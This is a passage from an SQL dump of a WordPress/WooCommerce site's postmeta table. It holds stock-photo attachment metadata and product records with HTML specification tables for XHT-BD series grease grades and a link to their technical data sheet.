";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5740, 689, '_wp_attached_file', '2016/08/shutterstock_209111524.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5741, 689, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7360;s:6:"height";i:4912;s:4:"file";s:34:"2016/08/shutterstock_209111524.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209111524-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_209111524-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_209111524-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_209111524-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209111524-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_209111524-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_209111524-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_209111524-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5742, 690, '_wp_attached_file', '2016/08/shutterstock_255838942.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5743, 690, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5092;s:6:"height";i:3395;s:4:"file";s:34:"2016/08/shutterstock_255838942.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_255838942-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_255838942-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_255838942-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_255838942-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_255838942-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_255838942-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_255838942-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_255838942-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5744, 691, '_wp_attached_file', '2016/08/shutterstock_268355474.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5745, 691, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:2667;s:4:"file";s:34:"2016/08/shutterstock_268355474.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268355474-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_268355474-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_268355474-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_268355474-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268355474-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_268355474-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_268355474-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_268355474-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5746, 692, '_wp_attached_file', '2016/08/shutterstock_316632911.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5747, 692, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5379;s:6:"height";i:3586;s:4:"file";s:34:"2016/08/shutterstock_316632911.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_316632911-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_316632911-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_316632911-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_316632911-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_316632911-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_316632911-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_316632911-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_316632911-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5748, 693, '_wp_attached_file', '2016/08/shutterstock_336316772.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5749, 693, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/08/shutterstock_336316772.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336316772-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_336316772-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_336316772-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_336316772-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336316772-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_336316772-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_336316772-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_336316772-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5750, 694, '_wp_attached_file', '2016/08/shutterstock_437367067.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5751, 694, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4500;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_437367067.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_437367067-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_437367067-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_437367067-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_437367067-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_437367067-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_437367067-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_437367067-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_437367067-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5753, 696, '_edit_lock', '1475690514:2'); 
INSERT INTO `wp_postmeta` VALUES (5754, 696, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5755, 696, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5756, 696, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5757, 696, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-BD</td>\r\n<td style="text-align: center;" width="241">XHT-BDX</td>\r\n<td style="text-align: center;" width="213">XHT-BDZ</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-15-350)</td>\r\n<td style="text-align: center;">(-5-360)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(5-662)</td>\r\n<td style="text-align: center;">(23-680)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n<td style="text-align: center;">3500</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">1023</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">88</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5758, 696, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5759, 696, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:15:"Tech Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5760, 696, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5761, 696, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5762, 696, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5763, 696, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5764, 696, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5765, 696, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5766, 696, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5767, 696, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5768, 696, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5769, 696, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5770, 696, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5771, 696, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5772, 696, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5773, 696, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5774, 696, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5775, 696, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5776, 696, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5777, 696, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5778, 696, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5779, 696, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5780, 696, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5781, 696, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5782, 696, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5783, 696, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5784, 696, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5785, 696, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5786, 696, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5816, 696, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5817, 696, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5818, 697, '_edit_lock', '1475690408:2'); 
INSERT INTO `wp_postmeta` VALUES (5819, 697, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (5820, 697, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (5821, 697, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (5822, 697, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224">XHT-BD</td>\r\n<td style="text-align: center;" width="241">XHT-BDX</td>\r\n<td style="text-align: center;" width="213">XHT-BDZ</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Temperature Range</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">(-20-300)</td>\r\n<td style="text-align: center;">(-15-350)</td>\r\n<td style="text-align: center;">(-5-360)</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">(-4-572)</td>\r\n<td style="text-align: center;">(5-662)</td>\r\n<td style="text-align: center;">(23-680)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">1712</td>\r\n<td style="text-align: center;">2610</td>\r\n<td style="text-align: center;">3500</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">738</td>\r\n<td style="text-align: center;">1023</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">47</td>\r\n<td style="text-align: center;">65</td>\r\n<td style="text-align: center;">88</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5823, 697, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (5824, 697, '318_custom_list_file', 'a:1:{s:32:"9ad73b56f8e0fb40e93cb4ce5090eddb";a:3:{s:4:"name";s:7:"XHT PDF";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/XHT-PDF.pdf";s:4:"desc";s:15:"Tech Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (5825, 697, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (5826, 697, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5827, 697, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5828, 697, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (5829, 697, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5830, 697, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (5831, 697, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (5832, 697, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (5833, 697, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (5834, 697, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5835, 697, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5836, 697, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5837, 697, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (5838, 697, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (5839, 697, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (5840, 697, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (5841, 697, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5842, 697, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5843, 697, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (5844, 697, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5845, 697, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (5846, 697, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (5847, 697, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5848, 697, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (5849, 697, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (5850, 697, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (5851, 697, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (5881, 697, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (5882, 697, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (5883, 698, '_wp_attached_file', '2016/08/shutterstock_99487787.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5884, 698, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3593;s:6:"height";i:3744;s:4:"file";s:33:"2016/08/shutterstock_99487787.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_99487787-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_99487787-768x800.jpg";s:5:"width";i:768;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_99487787-768x800.jpg";s:5:"width";i:768;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_99487787-1535x1600.jpg";s:5:"width";i:1535;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_99487787-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_99487787-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_99487787-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_99487787-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3: